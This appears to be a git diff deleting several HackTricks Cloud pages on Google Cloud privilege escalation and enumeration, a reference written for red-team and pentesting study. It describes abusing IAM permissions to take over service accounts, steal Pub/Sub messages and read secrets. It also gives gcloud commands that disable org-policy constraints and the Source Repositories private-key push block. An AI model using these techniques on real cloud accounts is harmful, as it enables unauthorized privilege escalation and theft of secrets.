`container.daemonSets.create` | `container.daemonSets.update` | `container.deployments.create` | `container.deployments.update` | `container.jobs.create` | `container.jobs.update` | `container.pods.create` | `container.pods.update` | `container.replicaSets.create` | `container.replicaSets.update` | `container.replicationControllers.create` | `container.replicationControllers.update` | `container.scheduledJobs.create` | `container.scheduledJobs.update` | `container.statefulSets.create` | `container.statefulSets.update` - -All these permissions are going to allow you to **create or update a resource** where you can **define** a **pod**. 
Defining a pod you can **specify the SA** that is going to be **attached** and the **image** that is going to be **run**, therefore you can run an image that is going to **exfiltrate the token of the SA to your server** allowing you to escalate to any service account.\ -For more information check: - -As we are in a GCP environment, you will also be able to **get the nodepool GCP SA** from the **metadata** service and **escalate privileges in GC**P (by default the compute SA is used). - -### `container.secrets.get` | `container.secrets.list` - -As [**explained in this page**, ](../../kubernetes-security/abusing-roles-clusterroles-in-kubernetes/#listing-secrets)with these permissions you can **read** the **tokens** of all the **SAs of kubernetes**, so you can escalate to them. - -### `container.pods.exec` - -With this permission you will be able to **exec into pods**, which gives you **access** to all the **Kubernetes SAs running in pods** to escalate privileges within K8s, but also you will be able to **steal** the **GCP Service Account** of the **NodePool**, **escalating privileges in GCP**. - -### `container.pods.portForward` - -As **explained in this page**, with these permissions you can **access local services** running in **pods** that might allow you to **escalate privileges in Kubernetes** (and in **GCP** if somehow you manage to talk to the metadata service)**.** - -### `container.serviceAccounts.createToken` - -Because of the **name** of the **permission**, it **looks like that it will allow you to generate tokens of the K8s Service Accounts**, so you will be able to **privesc to any SA** inside Kubernetes. However, I couldn't find any API endpoint to use it, so let me know if you find it. 
- -### `container.mutatingWebhookConfigurations.create` | `container.mutatingWebhookConfigurations.update` - -These permissions might allow you to escalate privileges in Kubernetes, but more probably, you could abuse them to **persist in the cluster**.\ -For more information [**follow this link**](../../kubernetes-security/abusing-roles-clusterroles-in-kubernetes/#malicious-admission-controller). - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.md
deleted file mode 100644
index 38c2f36ce..000000000
--- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.md
+++ /dev/null
@@ -1,55 +0,0 @@
-# GCP - Deploymentmaneger Privesc
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## deploymentmanager
-
-### `deploymentmanager.deployments.create`
-
-This single permission lets you **launch new deployments** of resources into GCP with arbitrary service accounts. You could for example launch a compute instance with a SA to escalate to it.
-
-You could actually **launch any resource** listed in `gcloud deployment-manager types list`
-
-In the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/) following[ **script**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/deploymentmanager.deployments.create.py) is used to deploy a compute instance, however that script won't work. Check a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/1-deploymentmanager.deployments.create.sh)**.**
-
-### `deploymentmanager.deployments.update`
-
-This is like the previous abuse but instead of creating a new deployment, you modifies one already existing (so be careful)
-
-Check a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/e-deploymentmanager.deployments.update.sh)**.**
-
-### `deploymentmanager.deployments.setIamPolicy`
-
-This is like the previous abuse but instead of directly creating a new deployment, you first give you that access and then abuses the permission as explained in the previous _deploymentmanager.deployments.create_ section.
-
-## References
-
-* [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/)
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-misc-perms-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-misc-perms-privesc.md
deleted file mode 100644
index 05cf0eeb1..000000000
--- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-misc-perms-privesc.md
+++ /dev/null
@@ -1,51 +0,0 @@
-# GCP - Generic Permissions Privesc
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} - -## Generic Interesting Permissions - -### \*.setIamPolicy - -If you owns a user that has the **`setIamPolicy`** permission in a resource you can **escalate privileges in that resource** because you will be able to change the IAM policy of that resource and give you more privileges over it.\ -This permission can also allow to **escalate to other principals** if the resource allow to execute code and the iam.ServiceAccounts.actAs is not necessary. - -* _cloudfunctions.functions.setIamPolicy_ - * Modify the policy of a Cloud Function to allow yourself to invoke it. - -There are tens of resources types with this kind of permission, you can find all of them in [https://cloud.google.com/iam/docs/permissions-reference](https://cloud.google.com/iam/docs/permissions-reference) searching for setIamPolicy. - -### \*.create, \*.update - -These permissions can be very useful to try to escalate privileges in resources by **creating a new one or updating a new one**. These can of permissions are specially useful if you also has the permission **iam.serviceAccounts.actAs** over a Service Account and the resource you have .create/.update over can attach a service account. - -### \*ServiceAccount\* - -This permission will usually let you **access or modify a Service Account in some resource** (e.g.: compute.instances.setServiceAccount). This **could lead to a privilege escalation** vector, but it will depend on each case. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-orgpolicy-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-orgpolicy-privesc.md
deleted file mode 100644
index 60059cf64..000000000
--- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-orgpolicy-privesc.md
+++ /dev/null
@@ -1,53 +0,0 @@
-# GCP - Orgpolicy Privesc
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## orgpolicy
-
-### `orgpolicy.policy.set`
-
-An attacker leveraging **orgpolicy.policy.set** can manipulate organizational policies, which will allow him to remove certain restrictions impeding specific operations. For instance, the constraint **appengine.disableCodeDownload** usually blocks downloading of App Engine source code. However, by using **orgpolicy.policy.set**, an attacker can deactivate this constraint, thereby gaining access to download the source code, despite it initially being protected.
-
-{% code overflow="wrap" %}
-```bash
-# Get info
-gcloud resource-manager org-policies describe [--folder | --organization | --project ]
-
-# Disable
-gcloud resource-manager org-policies disable-enforce [--folder | --organization | --project ]
-```
-{% endcode %}
-
-A python script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/orgpolicy.policy.set.py).
-
-## References
-
-* [https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/](https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/)
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-pubsub-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-pubsub-privesc.md
deleted file mode 100644
index dbddd51d6..000000000
--- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-pubsub-privesc.md
+++ /dev/null
@@ -1,63 +0,0 @@
-# GCP - Pubsub Privesc
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## PubSub
-
-Get more information in:
-
-{% content-ref url="../gcp-services/gcp-pub-sub.md" %}
-[gcp-pub-sub.md](../gcp-services/gcp-pub-sub.md)
-{% endcontent-ref %}
-
-### `pubsub.snapshots.create`
-
-The snapshots of topics **contain the current unACKed messages and every message after it**. You could create a snapshot of a topic to **access all the messages**, **avoiding access the topic directly**.
-
-### **`pubsub.snapshots.setIamPolicy`**
-
-Assign the pervious permissions to you.
-
-### `pubsub.subscriptions.create`
-
-You can create a push subscription in a topic that will be sending all the received messages to the indicated URL
-
-### **`pubsub.subscriptions.update`**
-
-Set your own URL as push endpoint to steal the messages.
-
-### `pubsub.subscriptions.consume`
-
-Access messages using the subscription.
-
-### `pubsub.subscriptions.setIamPolicy`
-
-Give yourself any of the preiovus permissions
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-resourcemanager-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-resourcemanager-privesc.md
deleted file mode 100644
index 2d4dea5a5..000000000
--- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-resourcemanager-privesc.md
+++ /dev/null
@@ -1,45 +0,0 @@
-# GCP - Resourcemanager Privesc
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## resourcemanager
-
-### `resourcemanager.organizations.setIamPolicy`
-
-Like in the exploitation of `iam.serviceAccounts.setIamPolicy`, this permission allows you to **modify** your **permissions** against **any resource** at **organization** level. So, you can follow the same exploitation example.
-
-### `resourcemanager.folders.setIamPolicy`
-
-Like in the exploitation of `iam.serviceAccounts.setIamPolicy`, this permission allows you to **modify** your **permissions** against **any resource** at **folder** level. So, you can follow the same exploitation example.
-
-### `resourcemanager.projects.setIamPolicy`
-
-Like in the exploitation of `iam.serviceAccounts.setIamPolicy`, this permission allows you to **modify** your **permissions** against **any resource** at **project** level. So, you can follow the same exploitation example.
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-secretmanager-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-secretmanager-privesc.md
deleted file mode 100644
index 9f5c5a7d1..000000000
--- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-secretmanager-privesc.md
+++ /dev/null
@@ -1,64 +0,0 @@
-# GCP - Secretmanager Privesc
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## secretmanager
-
-For more information about secretmanager:
-
-{% content-ref url="../gcp-services/gcp-secrets-manager-enum.md" %}
-[gcp-secrets-manager-enum.md](../gcp-services/gcp-secrets-manager-enum.md)
-{% endcontent-ref %}
-
-### `secretmanager.versions.access`
-
-This give you access to read the secrets from the secret manager and maybe this could help to escalate privielegs (depending on which information is sotred inside the secret):
-
-```bash
-# Get clear-text of version 1 of secret: ""
-gcloud secrets versions access 1 --secret=""
-```
-
-As this is also a post exploitation technique it can be found in:
-
-{% content-ref url="../gcp-post-exploitation/gcp-secretmanager-post-exploitation.md" %}
-[gcp-secretmanager-post-exploitation.md](../gcp-post-exploitation/gcp-secretmanager-post-exploitation.md)
-{% endcontent-ref %}
-
-### `secretmanager.secrets.setIamPolicy`
-
-This give you access to give you access to read the secrets from the secret manager, like using:
-
-```bash
-gcloud secrets add-iam-policy-binding \
- --member="serviceAccount:@$PROJECT_ID.iam.gserviceaccount.com" \
- --role="roles/secretmanager.secretAccessor"
-```
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-sourcerepos-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-sourcerepos-privesc.md
deleted file mode 100644
index 8ef9a508e..000000000
--- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-sourcerepos-privesc.md
+++ /dev/null
@@ -1,115 +0,0 @@
-# GCP - Sourcerepos Privesc
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## Source Repositories
-
-For more information about Source Repositories check:
-
-{% content-ref url="../gcp-services/gcp-source-repositories-enum.md" %}
-[gcp-source-repositories-enum.md](../gcp-services/gcp-source-repositories-enum.md)
-{% endcontent-ref %}
-
-### `source.repos.get`
-
-With this permission it's possible to download the repository locally:
-
-```bash
-gcloud source repos clone --project=
-```
-
-### `source.repos.update`
-
-A principal with this permission **will be able to write code inside a repository cloned with `gcloud source repos clone `**. But note that this permission cannot be attached to custom roles, so it must be given via a predefined role like:
-
-* Owner
-* Editor
-* Source Repository Administrator (`roles/source.admin`)
-* Source Repository Writer (`roles/source.writer`)
-
-To write just perform a regular **`git push`**.
-
-### `source.repos.setIamPolicy`
-
-With this permission an attacker could grant himself the previous permissions.
-
-### Secret access
-
-If the attacker has **access to the secrets** where the tokens are stored, he will be able to steal them. For more info about how to access a secret check:
-
-{% content-ref url="gcp-secretmanager-privesc.md" %}
-[gcp-secretmanager-privesc.md](gcp-secretmanager-privesc.md)
-{% endcontent-ref %}
-
-### Add SSH keys
-
-It's possible to **add ssh keys to the Source Repository project** in the web console. It makes a post request to **`/v1/sshKeys:add`** and can be configured in [https://source.cloud.google.com/user/ssh\_keys](https://source.cloud.google.com/user/ssh_keys)
-
-Once your ssh key is set, you can access a repo with:
-
-{% code overflow="wrap" %}
-```bash
-git clone ssh://username@domain.com@source.developers.google.com:2022/p//r/
-```
-{% endcode %}
-
-And then use **`git`** commands are per usual.
-
-### Manual Credentials
-
-It's possible to create manual credentials to access the Source Repositories:
-
-
-
-Clicking on the first link it will direct you to [https://source.developers.google.com/auth/start?scopes=https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fcloud-platform\&state\&authuser=3](https://source.developers.google.com/auth/start?scopes=https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fcloud-platform\&state\&authuser=3)
-
-Which will prompt an **Oauth authorization prompt** to give access to **Google Cloud Development**. So you will need either the **credentials of the user** or an **open session in the browser** for this.
-
-This will send you to a page with a **bash script to execute** and configure a git cookie in **`$HOME/.gitcookies`**
-
-
-
-Executing the script you can then use git clone, push... and it will work.
-
-### `source.repos.updateProjectConfig`
-
-With this permission it's possible to disable Source Repositories default protection to not upload code containing Private Keys:
-
-```bash
-gcloud source project-configs update --disable-pushblock
-```
-
-You can also configure a different pub/sub topic or even disable it completely:
-
-```bash
-gcloud source project-configs update --remove-topic=REMOVE_TOPIC
-gcloud source project-configs update --remove-topic=UPDATE_TOPIC
-```
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-ai-platform-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-ai-platform-enum.md
deleted file mode 100644
index abbec6712..000000000
--- a/pentesting-cloud/gcp-security/gcp-services/gcp-ai-platform-enum.md
+++ /dev/null
@@ -1,48 +0,0 @@
-# GCP - AI Platform Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## [AI Platform](https://cloud.google.com/sdk/gcloud/reference/ai-platform/)
-
-Google [**AI Platform**](https://cloud.google.com/ai-platform/) is another "**serverless**" offering for **machine learning projects**.
-
-There are a few areas here you can look for interesting information like models and jobs.
-
-```bash
-# Models
-gcloud ai-platform models list
-gcloud ai-platform models describe
-gcloud ai-platform models get-iam-policy
-
-# Jobs
-gcloud ai-platform jobs list
-gcloud ai-platform jobs describe
-```
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-api-keys-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-api-keys-enum.md
deleted file mode 100644
index 0b4eea5f9..000000000
--- a/pentesting-cloud/gcp-security/gcp-services/gcp-api-keys-enum.md
+++ /dev/null
@@ -1,71 +0,0 @@
-# GCP - API Keys Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## Basic Information
-
-In Google Cloud Platform (GCP), API keys are a simple encrypted string that **identifies an application without any principa**l. They are used to **access Google Cloud APIs** that do not require user context. This means they are often used in scenarios where the application is accessing its own data rather than user data.
-
-### Restrictions
-
-You can **apply restrictions to API keys** for enhanced security. For example, you can restrict the key to be **used only by certain IP addresses, webs, android apps, iOS apps**, or restrict it to **certain APIs or services** within GCP.
-
-### Enumeration
-
-It's possible to **see the restriction of an API key** (including GCP API endpoints restriction) using the verbs list or describe:
-
-```bash
-gcloud services api-keys list
-gcloud services api-keys describe
-gcloud services api-keys list --show-deleted
-```
-
-{% hint style="info" %}
-It's possible to recover deleted keys before 30days passes, that's why you can list deleted keys.
-{% endhint %}
-
-### Privilege Escalation & Post Exploitation
-
-{% content-ref url="../gcp-privilege-escalation/gcp-apikeys-privesc.md" %}
-[gcp-apikeys-privesc.md](../gcp-privilege-escalation/gcp-apikeys-privesc.md)
-{% endcontent-ref %}
-
-### Unauthenticated Enum
-
-{% content-ref url="../gcp-unauthenticated-enum-and-access/gcp-api-keys-unauthenticated-enum.md" %}
-[gcp-api-keys-unauthenticated-enum.md](../gcp-unauthenticated-enum-and-access/gcp-api-keys-unauthenticated-enum.md)
-{% endcontent-ref %}
-
-### Persistence
-
-{% content-ref url="../gcp-persistence/gcp-api-keys-persistence.md" %}
